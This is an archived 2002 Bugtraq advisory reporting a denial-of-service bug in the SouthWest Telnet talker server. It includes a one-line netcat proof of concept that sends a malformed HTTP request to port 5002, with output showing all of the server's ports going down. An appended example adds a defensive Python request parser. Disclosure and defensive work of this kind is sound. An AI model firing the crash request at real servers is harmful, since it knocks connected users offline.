Bugtraq mailing list archives

SouthWest Telnet talker server. DoS (Denial of Service Attack).


From: Alex Hernandez <alex_hernandez () ureach com>
Date: Mon, 25 Mar 2002 20:59:20 -0500


------oOo------
SouthWest free Telnet talker server. DoS (Denial of Service 
Attack).
------oOo------

Company Affected: Scott Lloyd
Version: v1.0.0
Size: 2.74 MB
OS Affected: Windows ALL.

Author:

** Alex Hernandez <alex_hernandez () ureach com>
** Thanks to all the people from Spain and Argentina.
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.


----=[Brief Description]=------------
 
SouthWest is a free Telnet talker server for Windows. It 
includes full ANSI color support, 
a help system, an intuitive interface, and speed optimizations. 
Free, full source code is 
available at the company's Web site. 

----=[Summary]=----------------------

The server is very similar to IRC. By default it opens the 
following ports:

*Main socket initialized and listening on port 5000.
*Netlink socket initialized and listening on port 5001.
*HTTP server initialized and listening on port 5002.

The bug is on port 5002: a request sent via HTTP by a remote 
user crashes the system for any connected user.


------oOo------
Proof of concept


Example:


DoS

$ printf "GET /&Alex" |nc -vvn 127.0.0.1 5002
(UNKNOWN) [127.0.0.1] 5002 (?) open
sent 10, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5002
(UNKNOWN) [127.0.0.1] 5002 (?): connection refused
sent 0, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5000
(UNKNOWN) [127.0.0.1] 5000 (?): connection refused
sent 0, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5001
(UNKNOWN) [127.0.0.1] 5000 (?): connection refused
sent 0, rcvd 0: NOTSOCK


The system crashes and the admin needs to restart the service!



You can see this on screen:


[...]
Room: Hallway

You are in the hallway. The large front door leads out to the 
drive whilst
another smaller door leads into the wizards room. A corridor 
leads deeper
into the mansion.

Exits are: Drive  Wizroom  Corridor
Netlinks are: Cyber City

You are all alone here

Access is fixed to PUBLIC and there are 0 messages on the board.
Current topic: Topic has not been set
You say: Hello!
You say: Friends
You say: crash the system .....


Connection to host lost.

[...]

C:\>




------oOo------------------------------------
Vendor Response:
The vendor was notified
southwest () talker com
http://someplaceelse.dynip.com/southwest/
Temporary patch: no data from vendor.

Alex Hernandez <alex_hernandez () ureach com> (c) 2002.

------oOo------------------------------------
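
The advisory does not state the root cause of the crash. The following added example (not from the advisory and not SouthWest's code) shows a request-line parser for an HTTP listener that turns the input shape seen in the proof of concept, 10 bytes with no line terminator and no HTTP version, into an error status instead of an unhandled failure. The function names, the 2048-byte limit and the status codes are assumptions.

```python
# Added example; not SouthWest's code. Limits and status codes are assumptions.
MAX_LINE = 2048                      # assumed cap on request-line length
METHODS = {"GET", "HEAD"}            # assumed set of supported methods
VERSIONS = {"HTTP/1.0", "HTTP/1.1"}


class BadRequest(Exception):
    def __init__(self, status, reason):
        super().__init__(reason)
        self.status = status


def parse_request_line(buf: bytes, peer_closed: bool):
    """Return (method, path, version), or None if more bytes are needed."""
    end = buf.find(b"\n")
    if end == -1:
        if len(buf) > MAX_LINE:
            raise BadRequest(414, "request line too long")
        if peer_closed:
            # Shape of the advisory's request: data ends with no terminator.
            raise BadRequest(400, "closed before end of request line")
        return None                  # keep reading; caller enforces a timeout
    if end > MAX_LINE:
        raise BadRequest(414, "request line too long")
    try:
        text = buf[:end].rstrip(b"\r").decode("ascii")
    except UnicodeDecodeError:
        raise BadRequest(400, "non-ASCII request line") from None
    parts = text.split(" ")
    if len(parts) != 3:
        raise BadRequest(400, "expected METHOD SP PATH SP VERSION")
    method, path, version = parts
    if method not in METHODS:
        raise BadRequest(405, "method not allowed")
    if not path.startswith("/") or any(ord(c) < 0x21 or ord(c) == 0x7F for c in path):
        raise BadRequest(400, "invalid path")
    if version not in VERSIONS:
        raise BadRequest(505, "unsupported HTTP version")
    return method, path, version


def handle(buf: bytes, peer_closed: bool):
    """Map any input to a status code; a parse error never leaves this function."""
    try:
        req = parse_request_line(buf, peer_closed)
    except BadRequest as exc:
        return exc.status            # reply with an error and close this socket only
    return None if req is None else 200
```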





